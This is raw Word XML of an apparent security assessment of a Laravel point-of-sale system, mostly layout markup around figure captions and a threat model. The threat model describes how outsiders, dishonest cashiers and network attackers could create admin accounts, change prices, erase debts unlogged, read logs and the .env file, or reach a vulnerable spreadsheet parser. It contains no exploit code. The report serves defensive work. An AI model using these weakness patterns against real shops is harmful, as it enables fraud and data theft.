                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5257800" cy="3219893"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Figure 5. Malith - V-10 original invoice screen showing the client-controlled price and discount-request surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5257800" cy="3219480"/>
            <wp:docPr id="1399636541" name="Picture 1399636541"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="V09-secure-live.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5257800" cy="3219480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Figure 6. Hamna - V-09 secure login screen used during the security-response and configuration demonstration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5257800" cy="3219480"/>
            <wp:docPr id="1399636542" name="Picture 1399636542"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="V20-secure-live.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5257800" cy="3219480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Figure 7. Nimthra - V-20 secure employee stock view without wholesale-cost or margin fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205BCCD3" w14:textId="77777777"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2.1 Threat model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD8DF8" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">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We worked from three attackers, which is what makes the severity ratings meaningful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CC62B2" w14:textId="576287D8"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2576" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12524643" wp14:editId="795E34F4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2523232</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153081</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3057525" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25762" name="Group 25762"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3057525" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3057525" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="266" name="Shape 266"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="342900" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="342900" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="333375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="336005" y="0"/>
                                  <a:pt x="338250" y="930"/>
                                  <a:pt x="340110" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="341970" y="4649"/>
                                  <a:pt x="342899" y="6894"/>
                                  <a:pt x="342900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="342900" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="342899" y="135981"/>
                                  <a:pt x="341970" y="138226"/>
                                  <a:pt x="340110" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="338250" y="141945"/>
                                  <a:pt x="336005" y="142875"/>
                                  <a:pt x="333375" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138226"/>
                                  <a:pt x="0" y="135981"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4649"/>
                                  <a:pt x="2790" y="2789"/>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69" name="Shape 269"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="409574" y="0"/>
                            <a:ext cx="876300" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="876300" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="869405" y="0"/>
                                  <a:pt x="871650" y="930"/>
                                  <a:pt x="873510" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="875370" y="4649"/>
                                  <a:pt x="876300" y="6894"/>
                                  <a:pt x="876300" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="876300" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="876300" y="135981"/>
                                  <a:pt x="875370" y="138226"/>
                                  <a:pt x="873510" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="871650" y="141945"/>
                                  <a:pt x="869405" y="142875"/>
                                  <a:pt x="866775" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138226"/>
                                  <a:pt x="0" y="135981"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4649"/>
                                  <a:pt x="2790" y="2789"/>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72" name="Shape 272"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1543049" y="0"/>
                            <a:ext cx="1514475" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1514475" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1504950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1507580" y="0"/>
                                  <a:pt x="1509825" y="930"/>
                                  <a:pt x="1511685" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1513544" y="4649"/>
                                  <a:pt x="1514475" y="6894"/>
                                  <a:pt x="1514475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1514475" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1514475" y="135981"/>
                                  <a:pt x="1513544" y="138226"/>
                                  <a:pt x="1511685" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1509825" y="141945"/>
                                  <a:pt x="1507580" y="142875"/>
                                  <a:pt x="1504950" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138226"/>
                                  <a:pt x="0" y="135981"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4649"/>
                                  <a:pt x="2790" y="2789"/>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762" style="width:240.75pt;height:11.25pt;position:absolute;z-index:-2147483608;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:198.68pt;mso-position-vertical-relative:text;margin-top:12.0536pt;" coordsize="30575,1428">
                <v:shape id="Shape 266" style="position:absolute;width:3429;height:1428;left:0;top:0;" coordsize="342900,142875" path="m9525,0l333375,0c336005,0,338250,930,340110,2789c341970,4649,342899,6894,342900,9525l342900,133350c342899,135981,341970,138226,340110,140084c338250,141945,336005,142875,333375,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138226,0,135981,0,133350l0,9525c0,6894,930,4649,2790,2789c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 269" style="position:absolute;width:8763;height:1428;left:4095;top:0;" coordsize="876300,142875" path="m9525,0l866775,0c869405,0,871650,930,873510,2789c875370,4649,876300,6894,876300,9525l876300,133350c876300,135981,875370,138226,873510,140084c871650,141945,869405,142875,866775,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138226,0,135981,0,133350l0,9525c0,6894,930,4649,2790,2789c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 272" style="position:absolute;width:15144;height:1428;left:15430;top:0;" coordsize="1514475,142875" path="m9525,0l1504950,0c1507580,0,1509825,930,1511685,2789c1513544,4649,1514475,6894,1514475,9525l1514475,133350c1514475,135981,1513544,138226,1511685,140084c1509825,141945,1507580,142875,1504950,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138226,0,135981,0,133350l0,9525c0,6894,930,4649,2790,2789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 xml:space="preserve">A1 </w:t>
      </w:r>
      <w:r w:rsidR="005C54CB" w:rsidRPr="005C54CB">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The anonymous internet.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Can reach the API. Before our work: could create an administrator account (V-01), script the API from any website (V-08), and download </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>composer.lock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>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/storage/logs/laravel.log</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly (V-07).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF32D64" w14:textId="4421FC44"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 xml:space="preserve">A2 </w:t>
      </w:r>
      <w:r w:rsidR="005C54CB" w:rsidRPr="005C54CB">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A dishonest cashier.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Holds a valid employee token. This is the realistic insider: a shop employee with a till. Before our work: could sell at any price they chose (V-10), erase a customer's debt with no ledger entry (V-04), read every other branch's customers and invoices (V-03), void sales to conceal cash theft (V-02), read company-wide profit and margin (V02), and inspect supplier cost and margin in ordinary GRN/stock API responses (V-20). Critically, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">none of it was logged </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(V-11).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F21305F" w14:textId="7A1888BF"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4624" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42E0976B" wp14:editId="3D1DCE7F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1361182</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>334055</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25766" name="Group 25766"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="285750" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="286" name="Shape 286"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="285750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4649"/>
                                  <a:pt x="285750" y="6894"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="126454"/>
                                  <a:pt x="284820" y="128699"/>
                                  <a:pt x="282960" y="130558"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="132418"/>
                                  <a:pt x="278855" y="133348"/>
                                  <a:pt x="276225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133348"/>
                                  <a:pt x="4650" y="132418"/>
                                  <a:pt x="2790" y="130558"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4649"/>
                                  <a:pt x="2790" y="2789"/>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766" style="width:22.5pt;height:10.5pt;position:absolute;z-index:-2147483591;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:107.18pt;mso-position-vertical-relative:text;margin-top:26.3036pt;" coordsize="2857,1333">
                <v:shape id="Shape 286" style="position:absolute;width:2857;height:1333;left:0;top:0;" coordsize="285750,133350" path="m9525,0l276225,0c278855,0,281100,930,282960,2789c284820,4649,285750,6894,285750,9525l285750,123825c285750,126454,284820,128699,282960,130558c281100,132418,278855,133348,276225,133350l9525,133350c6895,133348,4650,132418,2790,130558c930,128699,0,126454,0,123825l0,9525c0,6894,930,4649,2790,2789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 xml:space="preserve">A3 </w:t>
      </w:r>
      <w:r w:rsidR="005C54CB" w:rsidRPr="005C54CB">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A network or supply-chain attacker.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Before our work: bearer tokens crossed one hop in cleartext (V-15), a poisoned spreadsheet reached a parser with two known CVEs (V-17 + V-12), and the production hostnames were published in a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">committed </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (V-14).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0749543A" w14:textId="65F039BE" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="101"/>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asset that matters most is not the customer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005C54CB" w:rsidRPr="005C54CB">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it is </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>the integrity of the money record</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. A POS system that cannot prove what was sold, at what price, by whom, is worthless as a book of account. Several findings below attack exactly that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2330F2E3" w14:textId="4BE41CD8" w:rsidR="00345BB3" w:rsidRDefault="00345BB3">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="213D148C" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="129DA205" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DACA26A" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A630DF" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRPr="005C54CB" w:rsidRDefault="00E868FD">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E2C2B0" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00E868FD" w:rsidRDefault="008125F0" w:rsidP="005C54CB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="24"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E868FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415393B5" w14:textId="093356C0" w:rsidR="00345BB3" w:rsidRPr="00E868FD" w:rsidRDefault="00345BB3">
      <w:pPr>
        <w:spacing w:after="224" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E566251" w14:textId="4457220C" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">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We combined four techniques deliberately, because each </w:t>
      </w:r>
      <w:r w:rsidR="00E868FD" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> what the others miss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130695EB" w14:textId="4080A8B3"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5648" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A64C98A" wp14:editId="179491C5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5247382</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153081</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="876300" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25767" name="Group 25767"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="876300" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="876300" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="300" name="Shape 300"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
